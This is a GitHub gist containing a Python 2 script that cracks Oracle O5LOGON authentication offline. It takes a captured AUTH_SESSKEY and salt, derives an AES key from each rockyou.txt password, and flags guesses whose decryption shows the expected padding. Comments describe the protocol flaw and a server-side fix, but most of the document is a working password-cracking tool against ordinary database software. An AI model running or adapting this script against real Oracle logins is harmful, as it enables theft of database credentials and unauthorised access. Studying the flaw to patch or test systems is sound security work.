
@davidlebr1
Created January 8, 2019 19:54
Oracle o5logon cracking in python
# http://www.ekoparty.org/archive/2012/PPT-Cryptographic_flaws_in_Oracle_Database_auth_protocol_v6.pdf
import binascii
import hashlib
from Crypto.Cipher import AES
# Python 2 script: str values are concatenated with the raw bytes returned by
# binascii.unhexlify, which only works where str is a byte string.
#
# Per the paper linked at the top of this file, AUTH_SESSKEY is encrypted
# under a key derived only from the account password and the salt in
# AUTH_VFR_DATA. Anyone who records both values can therefore test password
# guesses offline, so a captured pair should be treated as password-equivalent.
# The fix is on the server side: apply the vendor patch and restrict the
# accepted logon protocol versions in sqlnet.ora
# (SQLNET.ALLOWED_LOGON_VERSION_SERVER on current releases; confirm against
# vendor guidance).
AUTH_SESSKEY = "E29B5C0D81661D20620FE22C3C62BCADF55FE37583B7FE0F239C29932CB53AFAEDAA33D25EE8E39BADFFB919D96A6516"  # 96 hex characters = 48 bytes of ciphertext
AUTH_VFR_DATA = "52E3D49081B7906C810D"  # 20 hex characters = 10-byte salt

# Values that never change between guesses are decoded once, up front.
salt_bytes = binascii.unhexlify(AUTH_VFR_DATA)
ciphertext = binascii.unhexlify(AUTH_SESSKEY)
zero_iv = "\x00" * 16

# Hex form of six consecutive 0x08 bytes, used as the "looks like padding" test.
# NOTE(review): the marker is matched anywhere in the hex string (even across
# byte boundaries), not only at the end of the plaintext, so a hit is a
# candidate to confirm rather than a proven match.
PADDING_MARKER = "080808080808"

with open("rockyou.txt", "r") as wordlist:
    for line in wordlist:
        candidate = line.strip()

        # SHA-1(candidate || salt) is 20 bytes; four zero bytes extend it to
        # the 24-byte key that AES-192 expects.
        aes_key = hashlib.sha1(candidate + salt_bytes).digest() + "\x00\x00\x00\x00"

        # A fresh cipher object per guess, since CBC state is per-key.
        plaintext = AES.new(aes_key, AES.MODE_CBC, zero_iv).decrypt(ciphertext)
        val = binascii.hexlify(plaintext)

        if PADDING_MARKER in val:
            print("[*] Candidate : " + candidate + " : " + val)